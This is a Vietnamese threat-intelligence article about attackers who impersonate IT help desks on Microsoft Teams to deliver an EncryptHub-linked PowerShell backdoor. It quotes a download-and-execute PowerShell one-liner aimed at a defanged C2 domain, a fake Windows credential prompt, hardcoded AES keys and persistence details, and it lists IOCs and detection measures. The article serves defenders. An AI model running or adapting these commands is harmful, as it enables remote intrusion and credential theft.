Trong một diễn biến đáng lo ngại về an ninh doanh nghiệp, tội phạm mạng đã bắt đầu khai thác Microsoft Teams – nền tảng được tin cậy cho giao tiếp nội bộ và cộng tác – để phát tán mã độc dựa trên PowerShell và giành quyền truy cập từ xa trái phép vào các hệ thống Windows. Khả năng thực hiện remote code execution là mục tiêu cuối cùng của những cuộc tấn công này.

Chiến Thuật Khai Thác Microsoft Teams Mới Nhất

Các tác nhân đe dọa đang mạo danh nhân viên hỗ trợ IT và sử dụng kỹ thuật social engineering tinh vi. Họ bỏ qua các bộ lọc email truyền thống và hàng rào phòng thủ mạng, trực tiếp nhắm vào sự tin tưởng sâu sắc của người dùng vào các nền tảng cộng tác hàng ngày.

Kể từ khi ra mắt vào năm 2017, Microsoft Teams đã trở nên không thể thiếu đối với các tổ chức trên toàn thế giới, xử lý các cuộc trò chuyện, cuộc họp, chia sẻ tệp và nhiều hơn nữa. Tội phạm mạng đang tận dụng sự phổ biến này bằng cách tạo mới hoặc chiếm quyền điều khiển các tài khoản Teams hiện có.

Sau đó, chúng khởi tạo các phiên thoại hoặc trò chuyện dưới vỏ bọc “IT SUPPORT”, “Help Desk” hoặc các tên tùy chỉnh được trang trí bằng biểu tượng dấu tích để tạo sự hợp pháp. Các tài khoản này thường dựa trên tên miền onmicrosoft.com của Microsoft và các tiền tố chung như “admin” hoặc “supportbotit”, báo hiệu việc tạo tài khoản tự động hoặc hàng loạt.

Sử Dụng Công Cụ Truy Cập Từ Xa Hợp Pháp

Một khi phiên Teams được chấp nhận – thường được dàn dựng như một cuộc kiểm tra hiệu suất định kỳ hoặc cuộc gọi bảo trì – kẻ tấn công hướng dẫn nạn nhân cài đặt các công cụ truy cập từ xa như QuickAssist hoặc AnyDesk. Thông qua các tiện ích hợp pháp này, kẻ thù sau đó kiểm soát endpoint.

Không giống như các chiến dịch trước đây liên quan đến mã độc tống tiền BlackBasta, vốn bắt đầu bằng các email hàng loạt trước khi chuyển sang Teams, một số cuộc tấn công mạng gần đây bỏ qua email hoàn toàn, khởi đầu trực tiếp qua Teams. Những biến thể này cho thấy nhiều nhóm tác nhân hoặc chiến thuật đang phát triển, tất cả đều hướng đến mục tiêu cuối cùng là remote code execution.

Phân Tích Sâu Mã Độc PowerShell Multi-Stage

Sau khi thiết lập quyền kiểm soát từ xa, kẻ tấn công thực thi một payload PowerShell được gửi qua một lệnh cụ thể. Script đa giai đoạn này cung cấp khả năng đánh cắp thông tin đăng nhập, duy trì quyền truy cập, thu thập thông tin hệ thống và remote code execution.

Lệnh Thực Thi Payload PowerShell

powershell -nop -exec bypass -c "iex ((new-object net.webclient).downloadstring('hxxps://audiorealtek[.]com/payload/runner.ps1'))"

Thông Số AES Cứng và Liên Kết Nhóm Tấn Công

Đầu script, các tham số AES cứng duy nhất – $iv = "&9*zS7LY%ZN1thfI" và $key = "123456789012345678901234r0hollah" – cho phép các nhà phòng thủ điều tra và liên kết với các script trước đó được gán cho nhóm EncryptHub có động cơ tài chính, còn được gọi là Water Gamayun hoặc LARVA-208.

$iv = "&9*zS7LY%ZN1thfI"
$key = "123456789012345678901234r0hollah"

Các báo cáo OSINT liên kết nhóm này với việc khai thác lỗ hổng CVE zero-day CVE-2025-26633 (MSC EvilTwin) và các họ mã độc tùy chỉnh bao gồm SilentPrism và DarkWisp. Thông tin chi tiết về các chiến dịch khai thác Microsoft Teams này có thể tham khảo thêm tại blog Permiso.

Cơ Chế Duy Trì Đơn Thực Thi và Khó Khăn Phản Ứng

Khi thực thi, mã độc áp dụng cơ chế hoạt động đơn thực thi thông qua một mutex toàn cục, đảm bảo chỉ có một phiên bản của mã độc chạy trên hệ thống.

$mutex = New-Object System.Threading.Mutex($true, "Global{GUID}")
if (-not $mutex.WaitOne(0, $false)) { exit }

Sau đó, nó biên dịch và inject mã C# để gọi hàm RtlSetProcessIsCritical từ ntdll.dll, đánh dấu tiến trình PowerShell là quan trọng. Việc chấm dứt tiến trình này sẽ kích hoạt lỗi hệ thống (system crash), làm phức tạp quá trình ứng phó sự cố và cản trở việc ngăn chặn remote code execution.

Thu Thập Thông Tin Hệ Thống và Đánh Cắp Thông Tin Đăng Nhập

Một hàm SystemInfo thu thập chi tiết máy chủ như địa chỉ IP công cộng, UUID phần cứng, dữ liệu hệ điều hành. Thông tin này được định dạng dưới dạng JSON, mã hóa bằng AES và được rò rỉ đến máy chủ C2 của kẻ tấn công. Để đánh cắp thông tin đăng nhập, script gọi một cửa sổ nhắc thông tin đăng nhập Windows gốc.

# Ví dụ về việc gọi cửa sổ nhắc thông tin đăng nhập (mã thực tế phức tạp hơn)
$credential = Get-Credential -Message "Xác minh thông tin đăng nhập của bạn để tiếp tục."

Sự tích hợp liền mạch với giao diện người dùng Windows này làm giảm sự nghi ngờ của người dùng. Các thông tin đăng nhập đã lấy được sẽ được lưu vào tệp info.txt trong thư mục AppData của người dùng.

Cơ Chế Duy Trì Quyền Truy Cập (Persistence)

Mã độc đạt được sự duy trì bằng cách trước tiên cố gắng đăng ký một tác vụ đã lên lịch có tên “Google LLC Updater” để chạy payload khi đăng nhập. Nếu việc đăng ký tác vụ thất bại, nó sẽ chuyển sang sử dụng khóa Run trong Registry. Cả hai phương pháp đều tìm nạp script giai đoạn tiếp theo từ một tên miền dự phòng (https://cjhsbam[.]com/payload/runner.ps1), đảm bảo khả năng phục hồi chống lại các nỗ lực gỡ bỏ.

Kênh Chỉ Huy và Điều Khiển (C2)

Tất cả các giao tiếp C2 được mã hóa bằng khóa AES và IV đã được hard-code, được gửi đến https://audiorealtek[.]com/. Các phản hồi từ C2 được giải mã và thực thi dưới dạng các PowerShell jobs, tiếp tục hỗ trợ cho các hành vi remote code execution.

Chỉ Số Thỏa Hiệp (IOCs)

Các chỉ số thỏa hiệp sau đây có thể được sử dụng để phát hiện và ngăn chặn các cuộc tấn công liên quan đến chiến dịch này:

• Tên miền C2:
  • audiorealtek[.]com
  • cjhsbam[.]com
• Tham số mã hóa AES:
  • IV: &9*zS7LY%ZN1thfI
  • Key: 123456789012345678901234r0hollah
• Tên tác vụ đã lên lịch (Scheduled Task):Google LLC Updater

Phát Hiện và Phòng Ngừa Cuộc Tấn Công Mạng qua Microsoft Teams

Phát Hiện Chủ Động

Các doanh nghiệp sử dụng Permiso có thể tận dụng các cơ chế phát hiện tích hợp như P0_M365_TEAMS_CHAT_CREATED_BY_SUSPICIOUS_EXTERNAL_USER_1 và P0_M365_TEAMS_CHAT_MEMBER_NAME_SUSPICIOUS_CHARACTER_1 để xác định các tương tác Teams đáng ngờ.

Việc theo dõi chặt chẽ các hoạt động tạo tài khoản bất thường trong Microsoft Teams là rất quan trọng để phát hiện sớm các cuộc tấn công mạng.

Các Biện Pháp Bảo Mật Khuyến Nghị

Khi các tác nhân đe dọa tiếp tục chuyển sang các nền tảng cộng tác, các tổ chức phải tăng cường nhận thức về an ninh xung quanh các cuộc trò chuyện và cuộc gọi thoại từ bên ngoài. Thực thi danh sách cho phép/chặn tenant nghiêm ngặt cũng là một biện pháp cần thiết.

Việc phát hiện chủ động các tạo tác mật mã hard-code và các bảo vệ tiến trình bất thường trong các script PowerShell có thể cung cấp cảnh báo sớm quan trọng về các mối đe dọa social engineering đang phát triển này, giúp ngăn chặn remote code execution thành công.